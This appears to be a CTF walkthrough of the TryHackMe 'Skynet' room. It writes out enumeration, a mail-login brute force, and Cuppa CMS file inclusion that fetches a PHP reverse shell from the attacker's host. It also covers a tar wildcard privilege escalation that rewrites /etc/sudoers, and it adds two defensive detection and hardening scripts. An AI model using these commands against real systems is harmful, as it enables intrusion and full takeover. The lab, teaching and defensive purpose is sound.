Skynet

Reconnaissance

Initial nmap scan to find open ports, using the "treat all hosts as alive" flag (-Pn):

nmap -Pn 10.10.149.41

Detailed nmap scan:

Command Breakdown:

  • (-sV): Service version detection

  • (-sC): Default nmap scripts

  • (-p): Specifying the ports 22,80,110,139,143,445

  • (-oN nmap): Saving the output to a file called nmap

nmap -sV -sC -p 22,80,110,139,143,445 -oN nmap 10.10.149.41

Enumeration

Port 80: HTTP

Let's visit the website.

It is a search engine, but nothing happens if we search for something, and none of the buttons work either. The source code has nothing interesting as well.

Let's run a gobuster scan to find hidden directories and files:

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.149.41

Looks like we found some directories, but we are not allowed to access any of them.

After a while we get another hit.

The directory is called /squirrelmail; let's visit it and see if we have access to it.

And we do. It's a login form, so we need to find a username and a password.

Port 139,445: SMB

Let's use a tool called enum4linux, which enumerates Samba services on a machine:

enum4linux -a 10.10.149.41

Looking at the output, in the Share Enumeration section, the share names print$ and IPC$ are common, but anonymous and milesdyson are not, and milesdyson looks like a username, so let's add that to our notes.

Now let's try to access those shares using smbclient:

smbclient //10.10.149.41/anonymous

After hitting Enter at the password prompt:

We are logged in. Let's now explore.

There is a directory and a file; let's transfer the file, and the files inside the directory, to our machine.

get <file-name>

I am only transferring the log1.txt file because the other files are empty, as shown in the ls output.

Let's now read the files that we transferred to our machine:

cat <file-name>

So the attention.txt file tells us that all the employees' passwords have been changed and all of them are required to change their passwords. The second file looks like a password list, and since the file was named log, it might contain older passwords. We can also theorize that someone might not have changed their password, for example the person who wrote the attention note, Miles Dyson. We can try to brute force the SquirrelMail service we found on the web server with the username milesdyson and the password list we just saw.

Now I wanted to try using hydra or Burp Suite to do this, but I was looking at the walkthrough by John Hammond, and the Python script that he made was very interesting and valuable, so I made one and used that to find the correct password. Let's go through the steps he did.

Let's first open the developer tools (Ctrl + Shift + I) and then send a request with a random username and password. In the Network tab of the developer tools, we see a request to redirect.php appear when we hit login; let's look into that request.

Now let's copy the request: right-click the file name, go to Copy, and click Copy as cURL. We can then paste it into a cURL-to-Python-requests code converter and copy the resulting Python code to a file.

I'm going to create the file bruteforce.py. Once you do that, we need to modify the code a bit to make it brute force the service with the username and password list we provide.

This is how the code looks before any modifications:

And this is the code after modifications. I can try to explain what this code does, but I think John Hammond does a better job, so go watch the video he made if you want to understand the code.

Now if we save and run the code, we find the password.

The password is cyborg007haloterminator, which is also the answer to the first question in this room.

Port 80: HTTP

We can now log in to SquirrelMail.

There are three emails that Miles Dyson received. The ones with (no subject) have nothing of interest, but the Samba Password reset email has something really interesting.

We now have Miles Dyson's SMB password, which is )s{A&2Z=F^n_E.B' .

Port 139,445: SMB

Now that we have Miles Dyson's SMB password, we can log in to his share using smbclient:

smbclient -U milesdyson //10.10.149.41/milesdyson

We are now logged in. Let's list the files and directories on the share.

Looking through the files, only one file in the notes directory looks interesting, so let's transfer that file to our machine.

Now let's read the important.txt file.

The first line gives us a directory that we can visit on the web server, so let's do that.

Nothing of interest here or in the source code, so let's run gobuster to find hidden directories and files. The directory we just found is also the answer to the second question in this room.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.149.41/45kra24zxs28v3yd/

We find an administrator page; let's visit it.

It's a login page. The credentials we found earlier do not work here. The page shows the service name, Cuppa CMS, so let's use searchsploit to check whether there are any public exploits for this service:

searchsploit Cuppa

And there is one, so let's copy the exploit to our directory:

searchsploit -m php/webapps/25971.txt

We now can answer the third question in this room.

Exploitation

Reading through the exploit text, it looks like we can read the /etc/passwd file, so let's try that.

We need to replace the target and alerts placeholders as well:

curl http://10.10.149.41/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

It works. The exploit text also mentions that we can make the server run PHP files with this vulnerability, so we can write a command in a PHP file and serve it from an HTTP server on our machine; this works because the web server has a remote file inclusion vulnerability.

So first let's make the file with the command; let's call it command.php.

Let's see if the command whoami works.

Now we have to start an HTTP server so that the victim machine can fetch the file from us:

python -m http.server 8080

Now we run the curl command so that the target fetches command.php from our machine and executes it:

curl http://10.10.149.41/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.13.8.64:8080/command.php

And it works, as we get the expected output. Now, if we change command.php to a PHP reverse shell file, we can get a reverse shell on the machine. We can find a PHP reverse shell file here.
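From the defender's side, both of the attacker actions described so far leave a clear trail in the web server's access log: the login brute force shows up as a burst of POSTs to SquirrelMail's redirect.php from one address, and the Cuppa CMS abuse shows up as a query parameter carrying ../ sequences or a remote http:// URL. The following Python script is an added example, not part of this walkthrough or of the room, that parses Apache combined-log lines and flags both patterns. The log lines are constructed samples (not captured from the room's server), and the threshold of 10 login POSTs within 60 seconds is an assumption you would tune for your own site.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache combined-log sample (not captured from the room's server):
# 12 rapid POSTs to the SquirrelMail login handler, one ordinary login,
# one traversal attempt and one remote-URL attempt against the Cuppa CMS page.
LOGIN_PATH = "/squirrelmail/src/redirect.php"
ALERT_PATH = "/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php"
SAMPLE_LOG_LINES = [
    f'10.13.8.64 - - [10/Mar/2024:12:00:{i:02d} +0000] "POST {LOGIN_PATH} HTTP/1.1" 302 0 "-" "python-requests/2.31"'
    for i in range(12)
] + [
    f'192.0.2.10 - - [10/Mar/2024:12:05:00 +0000] "POST {LOGIN_PATH} HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    f'10.13.8.64 - - [10/Mar/2024:12:10:00 +0000] "GET {ALERT_PATH}?urlConfig=../../../../../../../../../etc/passwd HTTP/1.1" 200 1423 "-" "curl/8.0"',
    f'10.13.8.64 - - [10/Mar/2024:12:11:00 +0000] "GET {ALERT_PATH}?urlConfig=http://10.13.8.64:8080/command.php HTTP/1.1" 200 21 "-" "curl/8.0"',
    f'192.0.2.10 - - [10/Mar/2024:12:12:00 +0000] "GET /45kra24zxs28v3yd/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")
REMOTE_URL_RE = re.compile(r"^(https?|ftp)://", re.IGNORECASE)


def parse_line(line):
    """Parse one combined-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    return {
        "ip": m.group("ip"),
        "time": datetime.strptime(m.group("time"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": m.group("method"),
        "path": parts.path,
        "query": parts.query,
        "status": int(m.group("status")),
    }


def login_bruteforce_sources(lines, path=LOGIN_PATH, threshold=10, window=timedelta(seconds=60)):
    """Return {ip: most POSTs to `path` seen inside any `window`} for IPs reaching `threshold`."""
    posts = defaultdict(list)
    for rec in filter(None, map(parse_line, lines)):
        if rec["method"] == "POST" and rec["path"] == path:
            posts[rec["ip"]].append(rec["time"])
    flagged = {}
    for ip, times in posts.items():
        times.sort()
        start = 0
        for end in range(len(times)):  # sliding window over the sorted timestamps
            while times[end] - times[start] > window:
                start += 1
            count = end - start + 1
            if count >= threshold:
                flagged[ip] = max(flagged.get(ip, 0), count)
    return flagged


def file_inclusion_attempts(lines):
    """Return (ip, parameter, kind) for query values that look like LFI or RFI payloads."""
    hits = []
    for rec in filter(None, map(parse_line, lines)):
        for key, value in parse_qsl(rec["query"], keep_blank_values=True):
            value = unquote(value)  # also catches double-encoded payloads
            if TRAVERSAL_RE.search(value):
                hits.append((rec["ip"], key, "traversal"))
            elif REMOTE_URL_RE.match(value):
                hits.append((rec["ip"], key, "remote-url"))
    return hits


if __name__ == "__main__":
    for ip, count in login_bruteforce_sources(SAMPLE_LOG_LINES).items():
        print(f"possible login brute force from {ip}: {count} POSTs within a minute")
    for ip, key, kind in file_inclusion_attempts(SAMPLE_LOG_LINES):
        print(f"{kind} attempt from {ip} via parameter {key}")
```

Run it against a real access log by replacing SAMPLE_LOG_LINES with the file's lines; the two checks are independent, so the traversal and remote-URL rule can be applied to every request regardless of path, which is how the Cuppa CMS requests above would have been caught even without knowing the vulnerable script in advance.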

Once you copy the file and change the IP to your TryHackMe IP as mentioned in the file, copy it to the directory where you will start the HTTP server. Then change the file name in the curl URL, and start a Netcat listener matching the IP and port set in the PHP reverse shell file:

nc -lvnp 1234

Once you have done that, run the curl command. Also make sure the Python HTTP server is running:

curl http://10.10.149.41/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.13.8.64:8080/shell.php

After you hit enter, you should get a reverse shell on the machine.

You can now read user.txt, which is the answer to the fourth question of this room.

And you can use these commands to stabilize your shell:

python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm-color
Ctrl + z
stty raw -echo; fg
reset

Looking at the files and directories, there is a particular directory and file that look interesting: /backups and backup.sh.

Let's read the file.

It looks like it's changing directory into the /var/www/html folder and then running a tar command with the other file in the /backups directory. Looking at the tar command and at the * symbol, I was thinking that there should be an exploit based on this, so I went to Google and searched for it and found it.

The part that we are interested in is this:

I can try to explain what these commands do, but not as well as John Hammond, so make sure to go there and look at what the commands do and mean.

The commands that we will use are the following (also make sure to cd to /var/www/html before running them):

echo 'echo "www-data ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > privesc.sh
echo "/var/www/html"  > "--checkpoint-action=exec=sh privesc.sh"
echo "/var/www/html"  > --checkpoint=1

Wait a while for the scheduled backup to run, and then run the sudo -l command.
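The root cause here is that the shell, not tar, expands the unquoted * in backup.sh, so any entry in /var/www/html whose name begins with a dash lands on tar's command line and is parsed as an option. As an added example written from the hardening side (not part of this walkthrough or the room), the Python script below shows the argv that `tar cf backup.tgz *` really receives once the glob is expanded, audits a directory for such option-looking names, and builds the safer invocation `tar -czf archive -C dir .`, which lets tar walk the directory itself so entry names never reach the command line. The file names and paths are constructed for the demo.

```python
import os
import subprocess
import tarfile
import tempfile


def shell_glob_star(names):
    """What an unquoted * expands to: every non-dot entry, in byte order like the shell in the C locale."""
    return sorted(n for n in names if not n.startswith("."))


def glob_expanded_argv(names, archive_path):
    """The argv that `tar cf <archive> *` really receives after the shell expands the glob."""
    return ["tar", "cf", archive_path] + shell_glob_star(names)


def option_like_entries(names):
    """Entry names tar would parse as options instead of paths (they begin with '-')."""
    return [n for n in shell_glob_star(names) if n.startswith("-")]


def audit_directory(directory):
    """Audit a real directory that a cron job archives with a wildcard."""
    return option_like_entries(os.listdir(directory))


def safe_backup_command(src_dir, archive_path):
    """Safer form: tar walks the directory itself, so no entry name is ever an argument."""
    return ["tar", "-czf", archive_path, "-C", src_dir, "."]


if __name__ == "__main__":
    # Constructed demo tree: a web root with two option-looking names planted in it.
    # Nothing here is executed; the names are only listed, audited and archived.
    with tempfile.TemporaryDirectory() as root:
        for name in ("index.html", "--checkpoint=1", "--checkpoint-action=exec=sh privesc.sh"):
            with open(os.path.join(root, name), "w") as fh:
                fh.write("demo\n")
        print("shell would run:", glob_expanded_argv(os.listdir(root), "backup.tgz"))
        print("option-like entries:", audit_directory(root))
        archive = os.path.join(tempfile.gettempdir(), "safe-demo.tgz")
        subprocess.run(safe_backup_command(root, archive), check=True)
        with tarfile.open(archive) as tf:
            print("archived as plain members:", sorted(tf.getnames()))
        os.remove(archive)
```

Running the script prints the expanded argv with the two dash-named entries sitting where tar expects options, then shows the same names stored harmlessly as ./--checkpoint=1 style members when the -C dir . form is used. Adding a `--` before the file list also stops option parsing, but avoiding the glob altogether is simpler, and audit_directory is cheap enough to run from the backup job itself and alert before archiving.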

Now we can run all commands as root, so let's switch to the root user:

sudo su root

You can also read the root flag, which is the answer to the last question of the room.
